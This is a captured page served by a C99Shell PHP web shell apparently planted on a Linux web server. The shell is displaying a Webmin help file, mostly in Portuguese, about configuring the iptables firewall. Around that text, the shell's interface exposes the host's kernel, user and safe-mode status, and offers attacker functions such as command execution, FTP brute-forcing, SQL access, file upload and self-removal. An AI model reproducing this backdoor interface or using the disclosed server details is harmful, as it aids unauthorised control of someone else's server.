!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/firewall/help/   drwxr-xr-x
Free 3.75 GB of 27.03 GB (13.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     intro.pt_BR.UTF-8.html (4.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Firewall Linux

Introdução ao Módulo

Este módulo lhe permite configurar as características do firewall IPtables encontradas na série 2.4 do kernel do Linux. Diferente de alguns outros programas para configuração de firewall, ao invés de criar um shell script para configurar o firewall, ele lê e edita um arquivo salvo no formato de leitura e escrita do ipi(6)tables-restore e ipi(6)tables-save respectivamente.

Se você já possui um firewall em seu sistema que foi configurado manualmente ou a partir de um script, o módulo oferecerá para convertê-lo para um arquivo salvo no formato do IPtables, e criar um script que poderá ser executado durante a inicialização para a ativação das regras contidas no arquivo. Entretanto, se você fizer isso, você não deverá editar mais o script com as regras do firewall e deverá desabilitar sua execução durante a inicialização do sistema.

Visão geral sobre IPtables

Todo pacote de rede que vem para dentro, sai ou é redirecionado pelo seu sistema é checado em cada chain para determinar o que acontecerá com ele. Cada chain contém zero ou mais regras, que possuem condições (para determinar quais pacotes coincidem com ela) e uma ação (para controlar o que acontece com os pacotes que coincidem com ela). Cada chain possui também uma ação padrão que controla o que acontece com os pacotes que não coincidem com nenhuma regra.

Cada chain é parte de uma tabela, que atualmente são três:

  • Filtragem de Pacotes (filter)
    As chains nesta tabela podem ser utilizadas para controlas os dados que entram em seu sistema a partir de outros hosts na rede, dados enviados a partir do seu sistema por usuários e processos, e dados redirecionados pelo seu sistema se sua ação é como um roteador.

  • Tradução de endereço de rede (nat)
    Esta tabela pode ser utilizada para configurar NAT ou mascaramento, que são úteis se você quer dar acesso à internet a máquinas que estão na rede interna através de somente um IP real.

  • Alteração de Pacotes (mangle)
    Esta chain é para modificar pacotes redirecionados ou enviados pelo seu sistema.

Em adição às chains padrão que são parte de cada tabela, você também pode criar suas próprias chains que poderão ser executadas pela regras das chains padrão. Isto pode ser útil para agrupar e compartilhar regras que poderão ser utilizadas em múltiplos lugares.

A página principal

A página principal deste módulo lista todas as chains e regras de uma das tabelas disponíveis, selecionada a partir da lista no topo-esquerdo. Abaixo segue uma seção para cada chain da tabela atual, com todas a regras em cada chain listada e suas respectivas descrições. Para cada chain, você pode alterar a ação padrão utilizando o combobox, se a chain é uma chain padrão, ou apagá-la com o botão Apagar Chain se ela foi definida pelo usuário.

Você pode clicar em qualquer regra em uma chain para editá-la, clicar nas setas da direita de cada linha para movê-la para cima ou para baixo, ou clicar no botão Adicionar Regra para adicionar uma nova regra.Adicionando ou editando uma regra, você será levado para uma página na qual você poderá selecionar a ação para cada regra, e as condições para as quais a ação será executada.

Na parte de baixo da página está um botão para tornar a configuração atual do firewall ativa, carregando-a através do comando ipi(6)tables-restore. A seguir está um botão para fazer o inverso - pegar a configuração que está corrente no kernel e torná-la disponível para edição. Finalmente, se sua distribuição suportar, existe um botão para indicar se o firewall será ativado durante o boot ou não.

Filtering chains

For better collaboration with external iptables scripts you can exclude individual chains from the processing by the firewall. To do this, you must select direct processing of rules in the settings and enter a filter list, which excludes the appropriate chains from processing. Chains that are not exculded from editing are flagged with a "not managed by firewall" message.

IP Sets

Newer versions of ip(6)table support the ipset extension. IP sets are lists of IP addresses in the main memory, which can be searched very efficiently and used as a condition in rules. On the main page, existing IP sets that can be used by rules are displayed. Currently, however, it is not possible to manage these in the firewall.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0039 ]--